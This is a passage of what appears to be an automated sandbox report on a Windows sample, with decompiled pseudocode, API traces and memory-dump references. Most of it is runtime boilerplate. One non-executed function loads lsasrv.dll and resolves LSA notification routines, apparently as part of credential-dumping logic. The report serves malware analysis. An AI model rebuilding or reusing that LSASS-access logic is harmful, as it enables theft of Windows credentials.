    						if(_t34 == 0) {
    							_t28 =  *0xc6a004; // 0x26d30358
    							goto L13;
    						}
    						 *_t20 = E00C53E89(_t34);
    						goto L2;
    					} else {
    						goto L4;
    					}
    					while(1) {
    						L4:
    						_t13 = E00C53F46( *_t35); // executed
    						if(_t13 != 0) {
    							break;
    						}
    						_t35 = _t35 + 4;
    						if(_t35 != _a16) {
    							continue;
    						}
    						_t28 =  *0xc6a004; // 0x26d30358
    						goto L7;
    					}
    					_t28 =  *0xc6a004; // 0x26d30358
    					goto L8;
    				}
    				L2:
    				return _t34;
    			}

    APIs
    • GetProcAddress.KERNEL32(00000000,?,00C6AD38,00000000,?,?,00C540CF,00000008,InitializeCriticalSectionEx,00C63360,InitializeCriticalSectionEx,00000000,?,00C53E34,00C6AD38,00000FA0), ref: 00C53F0A
      • Part of subcall function 00C53F46: LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00C6AD38,?,?,00C53EED,?,00C6AD38,00000000,?,?,00C540CF,00000008,InitializeCriticalSectionEx), ref: 00C53F7E
      • Part of subcall function 00C53F46: GetLastError.KERNEL32(?,?,00C53EED,?,00C6AD38,00000000,?,?,00C540CF,00000008,InitializeCriticalSectionEx,00C63360,InitializeCriticalSectionEx,00000000,?,00C53E34), ref: 00C53F8A
      • Part of subcall function 00C53F46: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,?,00C53EED,?,00C6AD38,00000000,?,?,00C540CF,00000008,InitializeCriticalSectionEx,00C63360,InitializeCriticalSectionEx), ref: 00C53F98
      • Part of subcall function 00C53F46: FreeLibrary.KERNEL32(00000000,?,?,00C53EED,?,00C6AD38,00000000,?,?,00C540CF,00000008,InitializeCriticalSectionEx,00C63360,InitializeCriticalSectionEx,00000000), ref: 00C53FBA
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    C-Code - Quality: 88%
    			E100022EB(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
    				struct HINSTANCE__* _t13;
    				signed int* _t20;
    				signed int _t28;
    				signed int _t29;
    				signed int _t30;
    				signed int _t34;
    				intOrPtr* _t35;
    
    				_t20 = 0x1001ebd0 + _a4 * 4;
    				asm("lock cmpxchg [ebx], ecx");
    				_t28 =  *0x1001d018; // 0x26c1db24
    				_t30 = _t29 | 0xffffffff;
    				_t34 = _t28 ^ 0;
    				asm("ror esi, cl");
    				if(_t34 == _t30) {
    					L14:
    					return 0;
    				}
    				if(_t34 == 0) {
    					_t35 = _a12;
    					if(_t35 == _a16) {
    						L7:
    						_t13 = 0;
    						L8:
    						if(_t13 == 0) {
    							L13:
    							_push(0x20);
    							asm("ror edi, cl");
    							 *_t20 = _t30 ^ _t28;
    							goto L14;
    						}
    						_t34 = GetProcAddress(_t13, _a8);
    						if(_t34 == 0) {
    							_t28 =  *0x1001d018; // 0x26c1db24
    							goto L13;
    						}
    						 *_t20 = E10001371(_t34);
    						goto L2;
    					} else {
    						goto L4;
    					}
    					while(1) {
    						L4:
    						_t13 = E1000238B( *_t35); // executed
    						if(_t13 != 0) {
    							break;
    						}
    						_t35 = _t35 + 4;
    						if(_t35 != _a16) {
    							continue;
    						}
    						_t28 =  *0x1001d018; // 0x26c1db24
    						goto L7;
    					}
    					_t28 =  *0x1001d018; // 0x26c1db24
    					goto L8;
    				}
    				L2:
    				return _t34;
    			}

    APIs
    • GetProcAddress.KERNEL32(00000000,00000001,00000001,00000000,?,?,10002460,00000005,FlsFree,10015250,FlsFree,00000000,?,10002275,00000005,10001E69), ref: 1000234F
      • Part of subcall function 1000238B: LoadLibraryExW.KERNELBASE(?,00000000,00000800,?,00000001,?,?,10002332,?,00000001,00000000,?,?,10002460,00000005,FlsFree), ref: 100023C3
      • Part of subcall function 1000238B: GetLastError.KERNEL32(?,10002332,?,00000001,00000000,?,?,10002460,00000005,FlsFree,10015250,FlsFree,00000000,?,10002275,00000005), ref: 100023CF
      • Part of subcall function 1000238B: LoadLibraryExW.KERNEL32(?,00000000,00000000,?,10002332,?,00000001,00000000,?,?,10002460,00000005,FlsFree,10015250,FlsFree,00000000), ref: 100023DD
      • Part of subcall function 1000238B: FreeLibrary.KERNEL32(00000000,?,10002332,?,00000001,00000000,?,?,10002460,00000005,FlsFree,10015250,FlsFree,00000000,?,10002275), ref: 100023FF
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    C-Code - Quality: 90%
    			E00C59075(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
    				struct HINSTANCE__* _t13;
    				signed int* _t20;
    				signed int _t27;
    				signed int _t28;
    				signed int _t29;
    				signed int _t33;
    				intOrPtr* _t34;
    
    				_t20 = 0xc6b408 + _a4 * 4;
    				_t27 =  *0xc6a004; // 0x26d30358
    				_t29 = _t28 | 0xffffffff;
    				_t33 = _t27 ^  *_t20;
    				asm("ror esi, cl");
    				if(_t33 == _t29) {
    					L14:
    					return 0;
    				}
    				if(_t33 == 0) {
    					_t34 = _a12;
    					if(_t34 == _a16) {
    						L7:
    						_t13 = 0;
    						L8:
    						if(_t13 == 0) {
    							L13:
    							_push(0x20);
    							asm("ror edi, cl");
    							 *_t20 = _t29 ^ _t27;
    							goto L14;
    						}
    						_t33 = GetProcAddress(_t13, _a8);
    						if(_t33 == 0) {
    							_t27 =  *0xc6a004; // 0x26d30358
    							goto L13;
    						}
    						 *_t20 = E00C53E89(_t33);
    						goto L2;
    					} else {
    						goto L4;
    					}
    					while(1) {
    						L4:
    						_t13 = E00C59111( *_t34); // executed
    						if(_t13 != 0) {
    							break;
    						}
    						_t34 = _t34 + 4;
    						if(_t34 != _a16) {
    							continue;
    						}
    						_t27 =  *0xc6a004; // 0x26d30358
    						goto L7;
    					}
    					_t27 =  *0xc6a004; // 0x26d30358
    					goto L8;
    				}
    				L2:
    				return _t33;
    			}

    APIs
    • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,00C592B5,00000006,FlsSetValue,00C64750,00C64758,00000000,00000364,?,00C58072,00000000), ref: 00C590D5
      • Part of subcall function 00C59111: LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00000000,00000000,?,00C590B8,?,00000000,00000000,00000000,?,00C592B5,00000006,FlsSetValue), ref: 00C59143
      • Part of subcall function 00C59111: GetLastError.KERNEL32(?,00C590B8,?,00000000,00000000,00000000,?,00C592B5,00000006,FlsSetValue,00C64750,00C64758,00000000,00000364,?,00C58072), ref: 00C5914F
      • Part of subcall function 00C59111: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00C590B8,?,00000000,00000000,00000000,?,00C592B5,00000006,FlsSetValue,00C64750,00C64758,00000000), ref: 00C5915D
      • Part of subcall function 00C59111: FreeLibrary.KERNEL32(00000000,?,00C590B8,?,00000000,00000000,00000000,?,00C592B5,00000006,FlsSetValue,00C64750,00C64758,00000000,00000364), ref: 00C5917F
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    C-Code - Quality: 90%
    			E100068C6(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
    				struct HINSTANCE__* _t13;
    				signed int* _t20;
    				signed int _t27;
    				signed int _t28;
    				signed int _t29;
    				signed int _t33;
    				intOrPtr* _t34;
    
    				_t20 = 0x1001edd8 + _a4 * 4;
    				_t27 =  *0x1001d018; // 0x26c1db24
    				_t29 = _t28 | 0xffffffff;
    				_t33 = _t27 ^  *_t20;
    				asm("ror esi, cl");
    				if(_t33 == _t29) {
    					L14:
    					return 0;
    				}
    				if(_t33 == 0) {
    					_t34 = _a12;
    					if(_t34 == _a16) {
    						L7:
    						_t13 = 0;
    						L8:
    						if(_t13 == 0) {
    							L13:
    							_push(0x20);
    							asm("ror edi, cl");
    							 *_t20 = _t29 ^ _t27;
    							goto L14;
    						}
    						_t33 = GetProcAddress(_t13, _a8);
    						if(_t33 == 0) {
    							_t27 =  *0x1001d018; // 0x26c1db24
    							goto L13;
    						}
    						 *_t20 = E10001371(_t33);
    						goto L2;
    					} else {
    						goto L4;
    					}
    					while(1) {
    						L4:
    						_t13 = E10006962( *_t34); // executed
    						if(_t13 != 0) {
    							break;
    						}
    						_t34 = _t34 + 4;
    						if(_t34 != _a16) {
    							continue;
    						}
    						_t27 =  *0x1001d018; // 0x26c1db24
    						goto L7;
    					}
    					_t27 =  *0x1001d018; // 0x26c1db24
    					goto L8;
    				}
    				L2:
    				return _t33;
    			}

    APIs
    • GetProcAddress.KERNEL32(00000000,00000001,00000001,00000000,?,?,10006CE0,00000008,GetCurrentPackageId,10016C18,GetCurrentPackageId,00000000,?,?,?,100051C5), ref: 10006926
      • Part of subcall function 10006962: LoadLibraryExW.KERNELBASE(?,00000000,00000800,?,?,00000001,?,10006909,?,00000001,00000000,?,?,10006CE0,00000008,GetCurrentPackageId), ref: 10006994
      • Part of subcall function 10006962: GetLastError.KERNEL32(?,10006909,?,00000001,00000000,?,?,10006CE0,00000008,GetCurrentPackageId,10016C18,GetCurrentPackageId,00000000), ref: 100069A0
      • Part of subcall function 10006962: LoadLibraryExW.KERNEL32(?,00000000,00000000,?,10006909,?,00000001,00000000,?,?,10006CE0,00000008,GetCurrentPackageId,10016C18,GetCurrentPackageId,00000000), ref: 100069AE
      • Part of subcall function 10006962: FreeLibrary.KERNEL32(00000000,?,10006909,?,00000001,00000000,?,?,10006CE0,00000008,GetCurrentPackageId,10016C18,GetCurrentPackageId,00000000), ref: 100069D0
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    C-Code - Quality: 96%
    			E00C60830(void* __ecx) {
    				long _v8;
    				signed int _t15;
    				signed int _t17;
    				long _t18;
    				int _t21;
    				void* _t26;
    				void* _t32;
    				intOrPtr _t36;
    				unsigned int* _t38;
    
    				_push(__ecx);
    				_t26 = __ecx;
    				_t32 = 0;
    				_t36 =  *((intOrPtr*)(__ecx + 0x138));
    				if(0 >=  *((intOrPtr*)(__ecx + 0x46))) {
    					L13:
    					return 0;
    				} else {
    					_t38 = _t36 + 0x24;
    					do {
    						_t15 =  *_t38;
    						if((_t15 & 0x00000020) != 0) {
    							 *_t38 = _t15 | 0x60000000;
    						}
    						_t17 =  *_t38 >> 0x1d;
    						if(_t17 > 6) {
    							L10:
    							_t18 = 0x40;
    						} else {
    							switch( *((intOrPtr*)(_t17 * 4 +  &M00C608D0))) {
    								case 0:
    									goto L11;
    								case 1:
    									_t18 = 0x10;
    									goto L11;
    								case 2:
    									goto L11;
    								case 3:
    									goto L11;
    								case 4:
    									goto L10;
    							}
    						}
    						L11:
    						_v8 = _t18;
    						_t21 = VirtualProtect( *((intOrPtr*)(_t38 - 0x18)) +  *((intOrPtr*)(_t26 + 0x144)),  *(_t38 - 0x1c), _t18,  &_v8); // executed
    						if(_t21 == 0) {
    							return 9;
    						} else {
    							goto L12;
    						}
    						goto L15;
    						L12:
    						_t32 = _t32 + 1;
    						_t38 =  &(_t38[0xa]);
    					} while (_t32 < ( *(_t26 + 0x46) & 0x0000ffff));
    					goto L13;
    				}
    				L15:
    			}

    APIs
    • VirtualProtect.KERNELBASE(?,000000FE,00000040,00C60629,00000000,00C60478,?,?,?,00C60629), ref: 00C608A4
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    C-Code - Quality: 95%
    			E00C5623C(void* __ecx, signed int _a4, signed int _a8) {
    				void* _t8;
    				void* _t12;
    				signed int _t13;
    				void* _t15;
    				signed int _t18;
    				long _t19;
    
    				_t15 = __ecx;
    				_t18 = _a4;
    				if(_t18 == 0) {
    					L2:
    					_t19 = _t18 * _a8;
    					if(_t19 == 0) {
    						_t19 = _t19 + 1;
    					}
    					while(1) {
    						_t8 = RtlAllocateHeap( *0xc6b498, 8, _t19); // executed
    						if(_t8 != 0) {
    							break;
    						}
    						__eflags = E00C55B23();
    						if(__eflags == 0) {
    							L8:
    							 *((intOrPtr*)(E00C56312())) = 0xc;
    							__eflags = 0;
    							return 0;
    						}
    						_t12 = E00C54EFB(_t15, __eflags, _t19);
    						_pop(_t15);
    						__eflags = _t12;
    						if(_t12 == 0) {
    							goto L8;
    						}
    					}
    					return _t8;
    				}
    				_t13 = 0xffffffe0;
    				if(_t13 / _t18 < _a8) {
    					goto L8;
    				}
    				goto L2;
    			}

    APIs
    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00C58055,00000001,00000364,?,00C534C0,?,?,1FFFFFFF,?,?,00C51EFE,00C51FCA), ref: 00C5627D
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    C-Code - Quality: 94%
    			E00C561AB(void* __ecx, long _a4) {
    				void* _t4;
    				void* _t6;
    				void* _t7;
    				long _t8;
    
    				_t7 = __ecx;
    				_t8 = _a4;
    				if(_t8 > 0xffffffe0) {
    					L7:
    					 *((intOrPtr*)(E00C56312())) = 0xc;
    					__eflags = 0;
    					return 0;
    				}
    				if(_t8 == 0) {
    					_t8 = _t8 + 1;
    				}
    				while(1) {
    					_t4 = RtlAllocateHeap( *0xc6b498, 0, _t8); // executed
    					if(_t4 != 0) {
    						break;
    					}
    					__eflags = E00C55B23();
    					if(__eflags == 0) {
    						goto L7;
    					}
    					_t6 = E00C54EFB(_t7, __eflags, _t8);
    					_pop(_t7);
    					__eflags = _t6;
    					if(_t6 == 0) {
    						goto L7;
    					}
    				}
    				return _t4;
    			}

    APIs
    • RtlAllocateHeap.NTDLL(00000000,00C51FCA,?,?,00C534C0,?,?,1FFFFFFF,?,?,00C51EFE,00C51FCA,?,?,?,?), ref: 00C561DD
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    C-Code - Quality: 94%
    			E10005DA1(void* __ecx, long _a4) {
    				void* __esi;
    				void* _t4;
    				void* _t6;
    				void* _t7;
    				void* _t8;
    				long _t9;
    
    				_t7 = __ecx;
    				_t9 = _a4;
    				if(_t9 > 0xffffffe0) {
    					L7:
    					 *((intOrPtr*)(E100068B3())) = 0xc;
    					__eflags = 0;
    					return 0;
    				}
    				if(_t9 == 0) {
    					_t9 = _t9 + 1;
    				}
    				while(1) {
    					_t4 = RtlAllocateHeap( *0x1001f1ec, 0, _t9); // executed
    					if(_t4 != 0) {
    						break;
    					}
    					__eflags = E1000A0C4();
    					if(__eflags == 0) {
    						goto L7;
    					}
    					_t6 = E10009C69(_t7, _t8, _t9, __eflags, _t9);
    					_pop(_t7);
    					__eflags = _t6;
    					if(_t6 == 0) {
    						goto L7;
    					}
    				}
    				return _t4;
    			}

    APIs
    • RtlAllocateHeap.NTDLL(00000000,00000001,00000004,?,1000DDBB,00000001,00000000,?,10009B15,00000001,00000004,00000000,00000001,?,?,10005AA6), ref: 10005DD3
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    C-Code - Quality: 16%
    			E10011140(void* __eflags) {
    				intOrPtr* _t4;
    				void* _t5;
    				void* _t6;
    				intOrPtr* _t7;
    
    				E10013E20(_t5, __eflags); // executed
    				__imp__RtlGetNtVersionNumbers(0x1001f384, 0x1001f3cc, 0x1001f388);
    				 *0x1001f388 =  *0x1001f388 & 0x00003fff;
    				_t7 = 0x1001a6e0;
    				_t6 = 2;
    				do {
    					_t4 =  *((intOrPtr*)( *_t7 + 0x14));
    					if(_t4 != 0) {
    						_t4 =  *_t4();
    					}
    					_t7 = _t7 + 4;
    					_t6 = _t6 - 1;
    				} while (_t6 != 0);
    				return _t4;
    			}

    APIs
      • Part of subcall function 10013E20: LoadLibraryW.KERNEL32(advapi32.dll), ref: 10013E35
      • Part of subcall function 10013E20: LoadLibraryW.KERNEL32(user32.dll), ref: 10013E3C
    • RtlGetNtVersionNumbers.NTDLL(1001F384,1001F3CC,1001F388), ref: 10011156
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd

    Non-executed Functions

    C-Code - Quality: 93%
    			E100114D0() {
    				intOrPtr _v20;
    				char _v24;
    				intOrPtr _v28;
    				char _v32;
    				signed int _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				char _v48;
    				intOrPtr _v52;
    				void* _v60;
    				char _v68;
    				signed int _v72;
    				_Unknown_base(*)()* _v76;
    				char _v84;
    				intOrPtr _t38;
    				void* _t43;
    				signed int _t49;
    				long* _t50;
    				void* _t51;
    				void* _t52;
    				void** _t53;
    				void** _t54;
    				intOrPtr _t55;
    				intOrPtr _t56;
    				_Unknown_base(*)()* _t57;
    				intOrPtr _t58;
    				_Unknown_base(*)()* _t59;
    				void* _t61;
    				struct HINSTANCE__* _t64;
    				signed int _t65;
    				intOrPtr _t67;
    				void** _t68;
    				void** _t72;
    				void** _t77;
    				signed int _t82;
    				signed int _t84;
    				void* _t86;
    				void* _t87;
    
    				_t86 = (_t84 & 0xfffffff8) - 0x48;
    				_v72 = 0x1001f2d0;
    				_v76 =  &_v68;
    				_t38 =  *0x1001d814; // 0xc0000225
    				if(_t38 >= 0) {
    					L24:
    					return _t38;
    				} else {
    					if( *0x1001f228 != 0) {
    						L3:
    						_v44 = 0;
    						_v52 =  &_v60;
    						_v48 =  &_v24;
    						RtlInitUnicodeString( &_v60, L"lsasrv.dll");
    						_push( &_v60);
    						_t65 = 0x1001f2d0;
    						_t43 = E100148C0(0x1001f2d0, E100146A0);
    						_t87 = _t86 + 4;
    						if(_t43 < 0 || _v52 == 0) {
    							goto L23;
    						} else {
    							_t82 = 0;
    							_v48 = _v32;
    							_v44 = _v28;
    							_v40 = _v24;
    							if( *0x1001f388 == 0xece) {
    								if(_v20 != 0x49901640) {
    									_t65 = 1;
    									_t82 =  <=  ? 1 : 0;
    								} else {
    									_t82 = 1;
    								}
    							}
    							if( *0x1001f220 != 0) {
    								L16:
    								_push(_t65);
    								_v84 = 0x1001d808;
    								_push( &_v48);
    								if(E10014190( &_v84, 9) == 0) {
    									goto L23;
    								} else {
    									_t49 = _v36;
    									_t67 =  *((intOrPtr*)(_t49 + 0x19 + _t82 * 4));
    									_t77 =  *(_t49 + 9);
    									_t72 =  *(_t49 - 4);
    									_t50 =  *(_t49 + 0x39 + _t82 * 8);
    									 *0x1001f334 = _t67;
    									 *0x1001f330 = _t77;
    									 *0x1001f338 = _t72;
    									 *0x1001f33c = _t50;
    									if(_t67 == 0 || _t77 == 0 || _t72 == 0 || _t50 == 0) {
    										goto L23;
    									} else {
    										 *_t50 = 0x100;
    										_t51 = LocalAlloc(0x40, 0x100);
    										_t68 =  *0x1001f330; // 0x0
    										 *_t68 = _t51;
    										_t52 = LocalAlloc(0x40, 0x90);
    										_t53 =  *0x1001f338; // 0x0
    										 *_t53 = _t52;
    										_t54 =  *0x1001f330; // 0x0
    										if( *_t54 == 0) {
    											goto L23;
    										} else {
    											_t55 =  *0x1001d814; // 0xc0000225
    											_t56 =  !=  ? 0 : _t55;
    											 *0x1001d814 = _t56;
    											return _t56;
    										}
    									}
    								}
    							} else {
    								_t57 = GetProcAddress( *0x1001f228, "LsaICancelNotification");
    								_v72 = _t57;
    								if(_t57 == 0) {
    									L14:
    									_t58 =  *0x1001f220; // 0x0
    								} else {
    									_t59 = GetProcAddress( *0x1001f228, "LsaIRegisterNotification");
    									_v76 = _t59;
    									if(_t59 == 0) {
    										goto L14;
    									} else {
    										_push(_t65);
    										_push( &_v48);
    										_t65 =  &_v84;
    										_t61 = E10014190(_t65, 8);
    										_t87 = _t87 + 8;
    										if(_t61 == 0) {
    											goto L14;
    										} else {
    											_t65 = _v36;
    											 *0x1001f224 =  *((intOrPtr*)(_t65 + 0x6c));
    											_t58 =  *((intOrPtr*)(_t65 + 0x70));
    											 *0x1001f220 = _t58;
    										}
    									}
    								}
    								if(_t58 == 0) {
    									goto L23;
    								} else {
    									goto L16;
    								}
    							}
    						}
    					} else {
    						_t64 = LoadLibraryW(L"lsasrv");
    						 *0x1001f228 = _t64;
    						if(_t64 == 0) {
    							L23:
    							_t38 =  *0x1001d814; // 0xc0000225
    							goto L24;
    						} else {
    							goto L3;
    						}
    					}
    				}
    			}

    APIs
    • LoadLibraryW.KERNEL32(lsasrv), ref: 10011505
    • RtlInitUnicodeString.NTDLL(?,lsasrv.dll), ref: 1001153A
      • Part of subcall function 100148C0: LocalFree.KERNEL32(?), ref: 10014976
      • Part of subcall function 100148C0: LocalAlloc.KERNEL32(00000040,?), ref: 10014A6F
      • Part of subcall function 100148C0: LocalFree.KERNEL32(?), ref: 10014ABD
      • Part of subcall function 100148C0: RtlInitUnicodeString.NTDLL(?,00000000), ref: 10014B53
      • Part of subcall function 100148C0: LocalFree.KERNEL32(?), ref: 10014B77
    • GetProcAddress.KERNEL32(LsaICancelNotification), ref: 100115C9
    • GetProcAddress.KERNEL32(LsaIRegisterNotification), ref: 100115DE
      • Part of subcall function 10014190: LocalAlloc.KERNELBASE(00000040,00001001,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 10014277
      • Part of subcall function 10014190: GlobalFree.KERNELBASE(?,?,?,00001DB1), ref: 100142C7
      • Part of subcall function 10014190: LocalFree.KERNEL32(?,00001DB1), ref: 100142EA
    • LocalAlloc.KERNEL32(00000040,00000100), ref: 10011693
    • LocalAlloc.KERNEL32(00000040,00000090), ref: 100116A8
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    C-Code - Quality: 77%
    			E1000B61E(void* __ebx, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
    				signed int _v0;
    				signed int _v8;
    				char _v460;
    				signed int _v464;
    				void _v468;
    				signed int _v472;
    				signed int _v932;
    				signed int _v936;
    				signed int _v1392;
    				signed int _v1396;
    				signed int _v1400;
    				char _v1860;
    				signed int _v1864;
    				signed int _v1865;
    				signed int _v1872;
    				signed int _v1876;
    				signed int _v1880;
    				signed int _v1884;
    				signed int _v1888;
    				signed int _v1892;
    				signed int _v1896;
    				intOrPtr _v1900;
    				signed int _v1904;
    				signed int _v1908;
    				signed int _v1912;
    				signed int _v1916;
    				signed int _v1920;
    				signed int _v1924;
    				signed int _v1928;
    				char _v1936;
    				char _v1944;
    				char _v2404;
    				signed int _v2408;
    				signed int _v2424;
    				void* __edi;
    				void* __esi;
    				signed int _t725;
    				signed int _t735;
    				signed int _t736;
    				signed int _t740;
    				intOrPtr _t742;
    				intOrPtr* _t743;
    				intOrPtr* _t746;
    				signed int _t751;
    				signed int _t752;
    				signed int _t758;
    				signed int _t764;
    				intOrPtr _t766;
    				void* _t767;
    				signed int _t768;
    				signed int _t769;
    				signed int _t770;
    				signed int _t778;
    				signed int _t779;
    				signed int _t782;
    				signed int _t783;
    				signed int _t784;
    				signed int _t787;
    				signed int _t788;
    				signed int _t789;
    				signed int _t791;
    				signed int _t792;
    				signed int _t793;
    				signed int _t794;
    				signed int _t799;
    				signed int _t800;
    				signed int _t805;
    				signed int _t806;
    				signed int _t809;
    				signed int _t813;
    				signed int _t820;
    				signed int* _t823;
    				signed int _t826;
    				signed int _t837;
    				signed int _t838;
    				signed int _t840;
    				char* _t841;
    				signed int _t843;
    				signed int _t847;
    				signed int _t848;
    				signed int _t852;
    				signed int _t854;
    				signed int _t859;
    				signed int _t867;
    				signed int _t870;
    				signed int _t872;
    				signed int _t875;
    				signed int _t876;
    				signed int _t877;
    				signed int _t880;
    				signed int _t893;
    				signed int _t894;
    				signed int _t896;
    				char* _t897;
    				signed int _t899;
    				signed int _t903;
    				signed int _t904;
    				signed int* _t906;
    				signed int _t908;
    				signed int _t910;
    				signed int _t915;
    				signed int _t922;
    				signed int _t925;
    				signed int _t929;
    				signed int* _t936;
    				intOrPtr _t938;
    				void* _t939;
    				intOrPtr* _t941;
    				signed int* _t945;
    				unsigned int _t956;
    				signed int _t957;
    				void* _t960;
    				signed int _t961;
    				void* _t963;
    				signed int _t964;
    				signed int _t965;
    				signed int _t966;
    				signed int _t974;
    				signed int _t979;
    				signed int _t982;
    				unsigned int _t985;
    				signed int _t986;
    				void* _t989;
    				signed int _t990;
    				void* _t992;
    				signed int _t993;
    				signed int _t994;
    				signed int _t995;
    				signed int _t999;
    				signed int* _t1004;
    				signed int _t1006;
    				signed int _t1016;
    				void _t1019;
    				signed int _t1022;
    				void* _t1025;
    				signed int _t1036;
    				signed int _t1037;
    				signed int _t1040;
    				signed int _t1041;
    				signed int _t1043;
    				signed int _t1044;
    				signed int _t1045;
    				signed int _t1049;
    				signed int _t1053;
    				signed int _t1054;
    				signed int _t1055;
    				signed int _t1057;
    				signed int _t1058;
    				signed int _t1059;
    				signed int _t1060;
    				signed int _t1061;
    				signed int _t1062;
    				signed int _t1064;
    				signed int _t1065;
    				signed int _t1066;
    				signed int _t1067;
    				signed int _t1068;
    				signed int _t1069;
    				unsigned int _t1070;
    				void* _t1073;
    				intOrPtr _t1075;
    				signed int _t1076;
    				signed int _t1077;
    				signed int _t1078;
    				signed int* _t1082;
    				void* _t1086;
    				void* _t1087;
    				signed int _t1088;
    				signed int _t1089;
    				signed int _t1090;
    				signed int _t1093;
    				signed int _t1094;
    				signed int _t1099;
    				signed int _t1101;
    				signed int _t1104;
    				char _t1109;
    				signed int _t1111;
    				signed int _t1112;
    				signed int _t1113;
    				signed int _t1114;
    				signed int _t1115;
    				signed int _t1116;
    				signed int _t1117;
    				signed int _t1121;
    				signed int _t1122;
    				signed int _t1123;
    				signed int _t1124;
    				signed int _t1125;
    				unsigned int _t1128;
    				void* _t1132;
    				void* _t1133;
    				unsigned int _t1134;
    				signed int _t1139;
    				signed int _t1140;
    				signed int _t1142;
    				signed int _t1143;
    				intOrPtr* _t1145;
    				signed int _t1146;
    				signed int _t1147;
    				signed int _t1150;
    				signed int _t1151;
    				signed int _t1154;
